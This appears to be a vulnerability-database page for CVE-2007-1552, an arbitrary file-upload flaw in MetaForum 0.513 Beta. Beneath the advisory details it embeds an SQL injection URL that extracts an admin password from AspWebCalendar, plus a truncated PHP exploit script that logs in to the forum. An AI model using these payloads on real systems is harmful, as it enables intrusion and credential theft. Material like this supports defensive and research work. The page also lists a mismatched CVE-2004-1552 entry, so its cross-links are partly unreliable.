CVE-2007-1552
published 2007-03-20CVE-2007-1552: Unrestricted file upload vulnerability in usercp.php in MetaForum 0.513 Beta restricts file types based on the MIME type in the Content-type HTTP header, which…
PriorityP351high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
5.46%
91.7th percentile
Unrestricted file upload vulnerability in usercp.php in MetaForum 0.513 Beta restricts file types based on the MIME type in the Content-type HTTP header, which allows remote attackers to upload and execute arbitrary scripts via an image MIME type with a filename containing an executable extension such as .php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| metaforum | metaforum | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
AspWebCalendar 4.5 - 'eventid' SQL Injection
exploitdb·2007-03-22
CVE-2004-1552 AspWebCalendar 4.5 - 'eventid' SQL Injection
AspWebCalendar 4.5 - 'eventid' SQL Injection
---
# Title : aspWebCalendar Remote SQL Injection Vulnerability
# Author : parad0x
# Contact : :(
# D.Page : http://www.scriptdungeon.com/script.php?ScriptID=4306
# $$ : free
#S.Page : http://fullrevolution.com
http://[target]/[path]/calendar.asp?action=viewevent&eventid=[SQL]
Example:
/calendar.asp?action=viewevent&eventid=-1%20union%20select%200,Cal_ConfigId,Cal_ConfigAdminPassword,3,4,5,6,7,8,9%20from%20Cal_config
"""""""""""""""""""""
greetz : VoLqaN, x-MastER,Ekin0x,xoron
"""""""""""""""""""""
www.p4r4d0x.com
# milw0rm.com [2007-03-22]
Exploit-DB
MetaForum 0.513 Beta - Arbitrary File Upload
exploitdb·2007-03-19
CVE-2007-1552 MetaForum 0.513 Beta - Arbitrary File Upload
MetaForum 0.513 Beta - Arbitrary File Upload
---
) :\r\n";
$phpcode = trim(fgets(STDIN));
echo "\r\n[+] Connection... ";
$sock = @fsockopen($argv[1], 80, $eno, $estr, 30);
if (!$sock) {
die("Failed\r\n\r\nCould not connect to ".$argv[1]." on the port 80 !");
}
echo "OK\r\n";
echo "[+] Login to account... ";
$reqlogin = "POST ".$argv[2]."index.php?shard=login&action=proc_login HTTP/1.1\r\n";
$reqlogin .= "Host: ".$argv[1]."\r\n";
$reqlogin .= "Accept: */*\r\n";
$reqlogin .= "Connection: Close\r\n";
$reqlogin .= "Content-Type: application/x-www-form-urlencoded\r\n";
$reqlogin .= "Content-Length: ".strlen("login_name=".$argv[3]."&login_pass=".$argv[4])."\r\n\r\n";
$reqlogin .= "login_name=".$argv[3]."&login_pass=".$argv[4];
fwrite($sock, $reqlogin);
while(!feof($sock)) {
$buffer = fgets($so
No writeups or analysis indexed.
http://osvdb.org/34523http://securityreason.com/securityalert/2454http://www.aeroxteam.fr/exploit-MetaForum-0.513b.txthttp://www.securityfocus.com/archive/1/463178/100/0/threadedhttp://www.securityfocus.com/bid/23032https://exchange.xforce.ibmcloud.com/vulnerabilities/33097https://www.exploit-db.com/exploits/3516http://osvdb.org/34523http://securityreason.com/securityalert/2454http://www.aeroxteam.fr/exploit-MetaForum-0.513b.txthttp://www.securityfocus.com/archive/1/463178/100/0/threadedhttp://www.securityfocus.com/bid/23032https://exchange.xforce.ibmcloud.com/vulnerabilities/33097https://www.exploit-db.com/exploits/3516
2007-03-20
Published